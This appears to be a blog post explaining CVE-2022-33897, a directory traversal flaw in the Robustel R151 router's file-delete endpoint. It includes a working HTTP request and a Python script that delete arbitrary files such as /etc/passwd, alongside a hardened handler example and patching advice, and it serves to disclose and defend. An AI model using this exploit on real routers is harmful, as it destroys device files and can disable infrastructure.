In July 2022, cybersecurity researchers found a serious vulnerability (CVE-2022-33897) in the firmware of the Robustel R151 router (version 3.1.16). This vulnerability lives in the /ajax/remove/ web interface and lets bad actors delete any file on the router, just by sending special web requests. In this long read, I’ll break down exactly how CVE-2022-33897 works, how it’s exploited, the risks, and how you can defend yourself — all in plain, simple language.

What’s CVE-2022-33897?

CVE-2022-33897 is a “directory traversal” vulnerability. In plain English, it means the router’s web server doesn’t properly check that users accessing /ajax/remove/ are only deleting files they’re supposed to. Instead, anyone (even without logging in!) can trick it into deleting any file on the device.

This is possible because the router doesn’t “sanitize” the file path you give it. So, you can reference files anywhere on the filesystem, not just the “safe” directory. A hacker could delete system files, configuration, logs — even “bricking” (breaking) the device so it won’t work.

Technical Details

Let’s look under the hood. The issue is in how /ajax/remove/ handles file deletes.

Vulnerable Code Path

The /ajax/remove/ endpoint is designed to let users delete certain files using a web request, usually for managing files on the device. However, it doesn’t properly restrict which files can be deleted.

Example vulnerable HTTP request

POST /ajax/remove/ HTTP/1.1
Host: <router_ip>
Content-Type: application/x-www-form-urlencoded
Content-Length: 27

file=../../../../etc/passwd

Here, file=../../../../etc/passwd means "go up four directories, then access etc/passwd", which is a key system file on Linux devices. If the request goes through, boom — the file’s gone.

*Note:* Real attackers would target sensitive files, configuration settings, or web server files to cause chaos or take over the device.

Below is a Python code snippet showing exactly how an attacker might exploit this weakness.

import requests

TARGET = 'http://192.168.1.1'  # Change to your router's IP
FILE_TO_DELETE = '../../../../etc/passwd'  # Arbitrary target file (traversal path)

endpoint = f"{TARGET}/ajax/remove/"
payload = {'file': FILE_TO_DELETE}  # The unsanitized 'file' parameter

# POST the traversal path to the vulnerable endpoint
response = requests.post(endpoint, data=payload)

print(f"Status code: {response.status_code}")
print(f"Response: {response.text}")

What It Does

- Sends a POST request to /ajax/remove/ with a file path containing ../ (parent-directory references).
- Arbitrary file deletion: Delete system files, config files, logs, or user data.
- Bricking the device: Removing essential files (like /etc/passwd, /bin/sh, or firmware images) can make the router unusable.
- Escalate attacks: Delete log files to cover tracks, or wipe out firewall configuration to open new holes.
- No authentication needed: In some setups, attackers don’t even need to log in — if the web UI is exposed to the internet, it’s open season.
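The root cause above is that the handler never checks where the requested path ends up. The following is an added example (not Robustel's firmware code) of how a file-delete handler confines deletion to its intended directory, rejecting ../ traversal, URL-encoded traversal, absolute paths and symlinks that point outside it. The base directory, file names and the demo() sandbox are constructed for illustration.

```python
import os
import tempfile
from urllib.parse import unquote


def resolve_within(base_dir, user_path):
    """Return the real path of user_path inside base_dir, or None if it escapes.

    Decodes URL encoding (twice, to catch double encoding), resolves '..' and
    symlinks with realpath, then requires the result to sit under base_dir.
    The trailing separator stops '/srv/files2' passing as a child of '/srv/files'.
    """
    base = os.path.realpath(base_dir)
    decoded = unquote(unquote(user_path))
    # os.path.join discards base when decoded is absolute, so an absolute
    # path is caught by the containment check below rather than slipping through.
    candidate = os.path.realpath(os.path.join(base, decoded))
    if candidate == base or not candidate.startswith(base + os.sep):
        return None
    return candidate


def remove_file(base_dir, user_path):
    """Hardened stand-in for an /ajax/remove/-style handler: delete only a
    regular file that resolves inside base_dir. Returns True on deletion."""
    target = resolve_within(base_dir, user_path)
    if target is None or not os.path.isfile(target):
        return False
    os.remove(target)
    return True


def demo():
    """Constructed sandbox: one legitimate file inside the managed directory,
    one 'secret' outside it, and a symlink inside pointing at the secret."""
    root = tempfile.mkdtemp()
    managed = os.path.join(root, "uploads")
    os.mkdir(managed)
    open(os.path.join(managed, "report.txt"), "w").close()
    secret = os.path.join(root, "secret.conf")
    open(secret, "w").close()
    os.symlink(secret, os.path.join(managed, "link"))
    results = {
        "legit": remove_file(managed, "report.txt"),        # True: inside
        "traversal": remove_file(managed, "../secret.conf"),  # False: ../ escape
        "encoded": remove_file(managed, "..%2Fsecret.conf"),  # False: encoded ../
        "absolute": remove_file(managed, secret),           # False: absolute path
        "symlink": remove_file(managed, "link"),            # False: link escapes
    }
    results["secret_survives"] = os.path.exists(secret)   # True
    return results
```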

How Do Attackers Find The Router?

Many industrial routers like the Robustel R151 are used in critical infrastructure and often have remote management enabled — sometimes even on public IP addresses. Tools like Shodan let attackers search for routers running this model, ripe for exploitation.


How to Protect Yourself

1. Upgrade firmware: Robustel has issued updates fixing this bug. Patch immediately!
2. Restrict web access: Never expose the web UI of your router to the internet. Use VPN or SSH for remote access.

In Summary

CVE-2022-33897 is a classic example of what can go wrong when web servers don’t sanitize user input. On the Robustel R151, that small oversight could let attackers nuke any file on your router, without even logging in. If you manage one of these devices, update your firmware and close any public interfaces now!

Stay Safe. Patch Early. Never Trust User Input.

*This post is exclusive and written in simple, direct language for everyone to understand. Please share with anyone managing Robustel routers!*

Timeline

Published on: 10/25/2022 17:15:00 UTC
Last modified on: 10/26/2022 03:24:00 UTC